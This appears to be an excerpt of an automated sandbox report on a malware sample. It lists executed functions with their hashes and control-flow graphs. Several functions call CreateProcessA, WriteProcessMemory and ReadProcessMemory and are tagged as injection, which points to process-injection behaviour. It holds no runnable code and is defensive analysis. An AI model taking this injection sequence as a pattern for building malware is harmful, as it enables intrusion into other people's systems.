API calls 37702->37704 37703 2e3b807 37703->37685 37704->37703 37706 2e3b901 37705->37706 37708 2e3b924 37705->37708 37706->37708 37713 2e3bb78 37706->37713 37717 2e3bb88 37706->37717 37707 2e3b91c 37707->37708 37709 2e3bb28 GetModuleHandleW 37707->37709 37708->37700 37710 2e3bb55 37709->37710 37710->37700 37714 2e3bb88 37713->37714 37716 2e3bbc1 37714->37716 37721 2e3b328 37714->37721 37716->37707 37718 2e3bb9c 37717->37718 37719 2e3b328 LoadLibraryExW 37718->37719 37720 2e3bbc1 37718->37720 37719->37720 37720->37707 37723 2e3bd68 LoadLibraryExW 37721->37723 37724 2e3bde1 37723->37724 37724->37716 37726 2e3da60 37725->37726 37727 2e3daa7 37726->37727 37733 2e3d388 37726->37733 37727->37689 37730 2e3da6d 37729->37730 37731 2e3daa7 37730->37731 37732 2e3d388 2 API calls 37730->37732 37731->37689 37732->37731 37734 2e3d393 37733->37734 37736 2e3e3ef 37734->37736 37737 2e3d4b4 37734->37737 37736->37727 37738 2e3d4bf 37737->37738 37739 2e37198 2 API calls 37738->37739 37740 2e3e427 37739->37740 37740->37734 37861 2e3db78 37862 2e3dbbe 37861->37862 37866 2e3dd48 37862->37866 37869 2e3dd58 37862->37869 37863 2e3dcab 37872 2e3d450 37866->37872 37870 2e3dd86 37869->37870 37871 2e3d450 DuplicateHandle 37869->37871 37870->37863 37871->37870 37873 2e3ddc0 DuplicateHandle 37872->37873 37874 2e3dd86 37873->37874 37874->37863 37882 2db9337 37883 2db92fc 37882->37883 37884 2db93f4 37883->37884 37885 2db95a8 12 API calls 37883->37885 37885->37884

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 02DB1D50 Relevance: .2, Instructions: 228COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 04fcce7cb3370c2bd34ac4c631f6e50a9bb43b4e1354f964602275e565d7d5a8
                                                                                                                                                              • Instruction ID: f64b0b48995c4158a09c027c917427fa41d626688d0674f2140d9f3c25e66681
                                                                                                                                                              • Opcode Fuzzy Hash: 04fcce7cb3370c2bd34ac4c631f6e50a9bb43b4e1354f964602275e565d7d5a8
                                                                                                                                                              • Instruction Fuzzy Hash: 82910571E05219DFDB19CFA6D9916DEFBB2BF89300F20942AD45AA7314DB349906CF40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB1D60 Relevance: .2, Instructions: 228COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4a82f99ea9c7b3b7dcd4c7beea089abd50792586a60cceb2b71701142b59d8d4
                                                                                                                                                              • Instruction ID: 006024d4bc0233275498f32f473a058524193fe5d37569a693251339110f8bb6
                                                                                                                                                              • Opcode Fuzzy Hash: 4a82f99ea9c7b3b7dcd4c7beea089abd50792586a60cceb2b71701142b59d8d4
                                                                                                                                                              • Instruction Fuzzy Hash: D0A1F470D05219DFDB18CFA6C9955DEFBB2FF89300F20942AD52AAB214DB349906CF40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB1178 Relevance: .2, Instructions: 216COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 525a0dac877f8cc9defd78a8a1f51a9d6233f5eddac065887b14db736ad98599
                                                                                                                                                              • Instruction ID: 90a753902683896df8b2c6a5b61280bcb5e5fc97229f492649ca798b6732a2a3
                                                                                                                                                              • Opcode Fuzzy Hash: 525a0dac877f8cc9defd78a8a1f51a9d6233f5eddac065887b14db736ad98599
                                                                                                                                                              • Instruction Fuzzy Hash: A3912570D0520ADFCB14CFA5D5A59EEFBB2FF89304F20952AD45AAB254D7309A06CF00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB1168 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c72229c46e303b8a9fe3cf424d2bc1c8335d6b48a1f250a1b4f0d5d6a42dde4c
                                                                                                                                                              • Instruction ID: 172369390d747e6e9b867c7085c03a84371ee4fc999ab8b476aa002b91beb845
                                                                                                                                                              • Opcode Fuzzy Hash: c72229c46e303b8a9fe3cf424d2bc1c8335d6b48a1f250a1b4f0d5d6a42dde4c
                                                                                                                                                              • Instruction Fuzzy Hash: D5914770E0520ADFCB18CFA5D5959DEFBB2EF89310F20952AD45AE7254D730AA06CF00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054FB9F0 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 621 54fb9f0-54fc54b 632 54fc5ad-54fc645 call 54fba20 621->632 633 54fc54d-54fc5a5 621->633 646 54fc648 call 54fd669 632->646 647 54fc648 call 54fd678 632->647 633->632 638 54fc64b-54fc692 call 54fa148 call 54fba30 646->638 647->638
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $
                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                              • Opcode ID: 9d8679091530ba395fa9adfdbb90047f0d49202ccb320fbcb2dc57a0540d711e
                                                                                                                                                              • Instruction ID: edc6248d84fc490186be0c51d05668977f2059c087c4c924b19bde80fed61769
                                                                                                                                                              • Opcode Fuzzy Hash: 9d8679091530ba395fa9adfdbb90047f0d49202ccb320fbcb2dc57a0540d711e
                                                                                                                                                              • Instruction Fuzzy Hash: AE71C130920701CFDB08EF29D585595BBF1FF85304B5196A9E94AAB326EB71F894CF80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054FC418 Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 648 54fc418-54fc511 652 54fc51d-54fc529 648->652 653 54fc532-54fc54b 652->653 657 54fc5ad-54fc620 call 54fba20 653->657 658 54fc54d-54fc5a5 653->658 661 54fc625-54fc645 657->661 658->657 671 54fc648 call 54fd669 661->671 672 54fc648 call 54fd678 661->672 663 54fc64b-54fc692 call 54fa148 call 54fba30 671->663 672->663
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $
                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                              • Opcode ID: 08888c231f1681a9df486dd6511ff92de53f08087b35bbdf3a12d11b071afb99
                                                                                                                                                              • Instruction ID: 66d916adbcc86e4d480354b89d2a6361e9b45603dfb6d00c6e572f618cb7cd77
                                                                                                                                                              • Opcode Fuzzy Hash: 08888c231f1681a9df486dd6511ff92de53f08087b35bbdf3a12d11b071afb99
                                                                                                                                                              • Instruction Fuzzy Hash: 1571F530920701CFDB08EF29C5856957BF1FF85304B5196A9E94AAB326EB71F894CF40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB8F54 Relevance: 1.8, APIs: 1, Instructions: 263processCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 713 2db8f54-2db8f56 714 2db8f5a 713->714 715 2db8f58-2db8f59 713->715 716 2db8f5e-2db8ff5 714->716 717 2db8f5c-2db8f5d 714->717 715->714 721 2db902e-2db904e 716->721 722 2db8ff7-2db9001 716->722 717->716 718 2db8f38-2db8f48 717->718 729 2db9050-2db905a 721->729 730 2db9087-2db90b6 721->730 722->721 723 2db9003-2db9005 722->723 725 2db9028-2db902b 723->725 726 2db9007-2db9011 723->726 725->721 727 2db9013 726->727 728 2db9015-2db9024 726->728 727->728 728->728 731 2db9026 728->731 729->730 732 2db905c-2db905e 729->732 736 2db90b8-2db90c2 730->736 737 2db90ef-2db91a9 CreateProcessA 730->737 731->725 734 2db9081-2db9084 732->734 735 2db9060-2db906a 732->735 734->730 738 2db906e-2db907d 735->738 739 2db906c 735->739 736->737 740 2db90c4-2db90c6 736->740 750 2db91ab-2db91b1 737->750 751 2db91b2-2db9238 737->751 738->738 741 2db907f 738->741 739->738 742 2db90e9-2db90ec 740->742 743 2db90c8-2db90d2 740->743 741->734 742->737 745 2db90d6-2db90e5 743->745 746 2db90d4 743->746 745->745 747 2db90e7 745->747 746->745 747->742 750->751 761 2db923a-2db923e 751->761 762 2db9248-2db924c 751->762 761->762 763 2db9240 761->763 764 2db924e-2db9252 762->764 765 2db925c-2db9260 762->765 763->762 764->765 766 2db9254 764->766 767 2db9262-2db9266 765->767 768 2db9270-2db9274 765->768 766->765 767->768 769 2db9268 767->769 770 2db9286-2db928d 768->770 771 2db9276-2db927c 768->771 769->768 772 2db928f-2db929e 770->772 773 2db92a4 770->773 771->770 772->773 775 2db92a5 773->775 775->775
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DB9196
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                              • Opcode ID: 642dc12d6532bbde9625c55b86e90f6e0231ba919c35434cfbe3267bc7588047
                                                                                                                                                              • Instruction ID: 04df673a2be6c30964542ea68e5641152e6ecdf0194add08810cf09d93f3c492
                                                                                                                                                              • Opcode Fuzzy Hash: 642dc12d6532bbde9625c55b86e90f6e0231ba919c35434cfbe3267bc7588047
                                                                                                                                                              • Instruction Fuzzy Hash: C6A16871D00259CFDB21CFA8C860BEDBBB2BF48314F1485A9E94AA7340DB749985CF91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB8F60 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 776 2db8f60-2db8ff5 778 2db902e-2db904e 776->778 779 2db8ff7-2db9001 776->779 786 2db9050-2db905a 778->786 787 2db9087-2db90b6 778->787 779->778 780 2db9003-2db9005 779->780 782 2db9028-2db902b 780->782 783 2db9007-2db9011 780->783 782->778 784 2db9013 783->784 785 2db9015-2db9024 783->785 784->785 785->785 788 2db9026 785->788 786->787 789 2db905c-2db905e 786->789 793 2db90b8-2db90c2 787->793 794 2db90ef-2db91a9 CreateProcessA 787->794 788->782 791 2db9081-2db9084 789->791 792 2db9060-2db906a 789->792 791->787 795 2db906e-2db907d 792->795 796 2db906c 792->796 793->794 797 2db90c4-2db90c6 793->797 807 2db91ab-2db91b1 794->807 808 2db91b2-2db9238 794->808 795->795 798 2db907f 795->798 796->795 799 2db90e9-2db90ec 797->799 800 2db90c8-2db90d2 797->800 798->791 799->794 802 2db90d6-2db90e5 800->802 803 2db90d4 800->803 802->802 804 2db90e7 802->804 803->802 804->799 807->808 818 2db923a-2db923e 808->818 819 2db9248-2db924c 808->819 818->819 820 2db9240 818->820 821 2db924e-2db9252 819->821 822 2db925c-2db9260 819->822 820->819 821->822 823 2db9254 821->823 824 2db9262-2db9266 822->824 825 2db9270-2db9274 822->825 823->822 824->825 826 2db9268 824->826 827 2db9286-2db928d 825->827 828 2db9276-2db927c 825->828 826->825 829 2db928f-2db929e 827->829 830 2db92a4 827->830 828->827 829->830 832 2db92a5 830->832 832->832
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DB9196
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                              • Opcode ID: 2fa96630c06138709a4aeaa615164381eb3f0dfc81d9d2c0590a51a42bb95b11
                                                                                                                                                              • Instruction ID: eeeabbfe3326d0da77dd76b34cf4ac3d9fcc69ff3e8c98233dc963e543020d31
                                                                                                                                                              • Opcode Fuzzy Hash: 2fa96630c06138709a4aeaa615164381eb3f0dfc81d9d2c0590a51a42bb95b11
                                                                                                                                                              • Instruction Fuzzy Hash: 80917871D00259CFEF21DFA8C860BDDBBB2AF48314F1485A9E909A7340DB749985CF92
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02E3B8E0 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 833 2e3b8e0-2e3b8ff 834 2e3b901-2e3b90e call 2e3b2c4 833->834 835 2e3b92b-2e3b92f 833->835 842 2e3b910 834->842 843 2e3b924 834->843 836 2e3b943-2e3b984 835->836 837 2e3b931-2e3b93b 835->837 844 2e3b991-2e3b99f 836->844 845 2e3b986-2e3b98e 836->845 837->836 890 2e3b916 call 2e3bb88 842->890 891 2e3b916 call 2e3bb78 842->891 843->835 846 2e3b9c3-2e3b9c5 844->846 847 2e3b9a1-2e3b9a6 844->847 845->844 850 2e3b9c8-2e3b9cf 846->850 851 2e3b9b1 847->851 852 2e3b9a8-2e3b9af call 2e3b2d0 847->852 848 2e3b91c-2e3b91e 848->843 849 2e3ba60-2e3bb20 848->849 883 2e3bb22-2e3bb25 849->883 884 2e3bb28-2e3bb53 GetModuleHandleW 849->884 854 2e3b9d1-2e3b9d9 850->854 855 2e3b9dc-2e3b9e3 850->855 853 2e3b9b3-2e3b9c1 851->853 852->853 853->850 854->855 857 2e3b9f0-2e3b9f9 call 2e3b2e0 855->857 858 2e3b9e5-2e3b9ed 855->858 864 2e3ba06-2e3ba0b 857->864 865 2e3b9fb-2e3ba03 857->865 858->857 866 2e3ba29-2e3ba2d 864->866 867 2e3ba0d-2e3ba14 864->867 865->864 888 2e3ba30 call 2e3be79 866->888 889 2e3ba30 call 2e3be88 866->889 867->866 869 2e3ba16-2e3ba26 call 2e3b2f0 call 2e3b300 867->869 869->866 870 2e3ba33-2e3ba36 873 2e3ba59-2e3ba5f 870->873 874 2e3ba38-2e3ba56 870->874 874->873 883->884 885 2e3bb55-2e3bb5b 884->885 886 2e3bb5c-2e3bb70 884->886 885->886 888->870 889->870 890->848 891->848
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02E3BB46
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                              • Opcode ID: b80cd29059584b4836f45b86bebe3dc9501d0d038ae48c95e38e4ab7397f2a67
                                                                                                                                                              • Instruction ID: 8b0269495a8d7ed8443a631528b71a1ce9f2230bbda229eba79c40d077b74ce3
                                                                                                                                                              • Opcode Fuzzy Hash: b80cd29059584b4836f45b86bebe3dc9501d0d038ae48c95e38e4ab7397f2a67
                                                                                                                                                              • Instruction Fuzzy Hash: 02814870A00B058FD725DF2AD5497AABBF1FF88309F008A2DD48AD7A50DB74E945CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02E34638 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 892 2e34638-2e35de1 CreateActCtxA 895 2e35de3-2e35de9 892->895 896 2e35dea-2e35e44 892->896 895->896 903 2e35e53-2e35e57 896->903 904 2e35e46-2e35e49 896->904 905 2e35e59-2e35e65 903->905 906 2e35e68 903->906 904->903 905->906 908 2e35e69 906->908 908->908
                                                                                                                                                              APIs
                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02E35DD1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Create
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                              • Opcode ID: 78da8a92efe2d2d7d39346fd8e150c90f2b9a73e6497508db73a6dc52ca8fb0f
                                                                                                                                                              • Instruction ID: e66cbc618de941f8f7fffb49fcfe7d517d7a631c6d0502ddb721e68561f0a627
                                                                                                                                                              • Opcode Fuzzy Hash: 78da8a92efe2d2d7d39346fd8e150c90f2b9a73e6497508db73a6dc52ca8fb0f
                                                                                                                                                              • Instruction Fuzzy Hash: 2D41F0B0C0061DCBDB25DFAAC888BDEBBF5BF49304F60806AD408AB251DB756945CF90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02E35D15 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 909 2e35d15-2e35de1 CreateActCtxA 911 2e35de3-2e35de9 909->911 912 2e35dea-2e35e44 909->912 911->912 919 2e35e53-2e35e57 912->919 920 2e35e46-2e35e49 912->920 921 2e35e59-2e35e65 919->921 922 2e35e68 919->922 920->919 921->922 924 2e35e69 922->924 924->924
                                                                                                                                                              APIs
                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02E35DD1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Create
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                              • Opcode ID: 0da2b32f3c8c2253af1322afa4674c77cbb6151f0fb1910cdc529993a6bd054f
                                                                                                                                                              • Instruction ID: 5a43fa353e956ee52e5df51825edf2b0c5f87481381ebba468b3fafe1d5e44fe
                                                                                                                                                              • Opcode Fuzzy Hash: 0da2b32f3c8c2253af1322afa4674c77cbb6151f0fb1910cdc529993a6bd054f
                                                                                                                                                              • Instruction Fuzzy Hash: 1D41D1B0C00619CBDB25CFA9C888BDEBBF5BF49304F64806AD448AB255DB756946CF90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB8DC3 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 925 2db8dc3-2db8dc5 926 2db8da0 925->926 927 2db8dc7-2db8e55 ReadProcessMemory 925->927 928 2db8dae 926->928 929 2db8da2-2db8dad 926->929 932 2db8e5e-2db8e8e 927->932 933 2db8e57-2db8e5d 927->933 929->928 933->932
                                                                                                                                                              APIs
                                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DB8E48
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                                              • Opcode ID: 219afb36532f53cb8762b9e8b19f20d9fa1fffda9b6ef235e882be758d556b5f
                                                                                                                                                              • Instruction ID: 3f9c149f57b684f2da1fc3ea68250454a9ccd65d824f4df2ef3a6b44c1f94298
                                                                                                                                                              • Opcode Fuzzy Hash: 219afb36532f53cb8762b9e8b19f20d9fa1fffda9b6ef235e882be758d556b5f
                                                                                                                                                              • Instruction Fuzzy Hash: E72168B6D00249CFCB10CFA9D880BEEFBB4FF88320F10842AE559A3251D7399945DB61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB8CD3 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 937 2db8cd3-2db8d26 939 2db8d28-2db8d34 937->939 940 2db8d36-2db8d75 WriteProcessMemory 937->940 939->940 942 2db8d7e-2db8dae 940->942 943 2db8d77-2db8d7d 940->943 943->942
                                                                                                                                                              APIs
                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02DB8D68
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                              • Opcode ID: 6a82e7b1c00f2a835be10bb7dfbb3fc3434fb7bf5a4ee89f5fd2ecd1a527d630
                                                                                                                                                              • Instruction ID: 5ecf5a4d3a7ecee19ddb022e6bc184268171f44063e4970d2df3075677845184
                                                                                                                                                              • Opcode Fuzzy Hash: 6a82e7b1c00f2a835be10bb7dfbb3fc3434fb7bf5a4ee89f5fd2ecd1a527d630
                                                                                                                                                              • Instruction Fuzzy Hash: 202166B1900249CFCB10CFA9C881BEEBBF5FF48310F10842AE859A7340C7789945CB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB8CD8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 948 2db8cd8-2db8d26 950 2db8d28-2db8d34 948->950 951 2db8d36-2db8d75 WriteProcessMemory 948->951 950->951 953 2db8d7e-2db8dae 951->953 954 2db8d77-2db8d7d 951->954 954->953
                                                                                                                                                              APIs
                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02DB8D68
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                              • Opcode ID: 5dfff6dfae9fc78d70a59c440116d68d056fcd22c697b9dee608657517a603ce
                                                                                                                                                              • Instruction ID: 684a1fc4b5e95cc797c781a621ab89732a2b2dac4001b63ddca08b2ee2a862b8
                                                                                                                                                              • Opcode Fuzzy Hash: 5dfff6dfae9fc78d70a59c440116d68d056fcd22c697b9dee608657517a603ce
                                                                                                                                                              • Instruction Fuzzy Hash: 162144B5900349DFCB10CFA9C880BDEBBF5FF48310F10842AE959A7240C7789944DBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02E3D450 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E3DD86,?,?,?,?,?), ref: 02E3DE47
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                              • Opcode ID: 6dd2410692ae3903090c88276118aad183c8f00a8ae36f5a7c228ac4e8fca6ce
                                                                                                                                                              • Instruction ID: 69141dfe271f8d7d1317ceebd6fb809028b25235f6f7d6285ed797c6846b7e0d
                                                                                                                                                              • Opcode Fuzzy Hash: 6dd2410692ae3903090c88276118aad183c8f00a8ae36f5a7c228ac4e8fca6ce
                                                                                                                                                              • Instruction Fuzzy Hash: EF2114B5D00208DFDB10CF9AD984AEEBFF4EB48320F10845AE954A3310D374A940CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB8B38 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
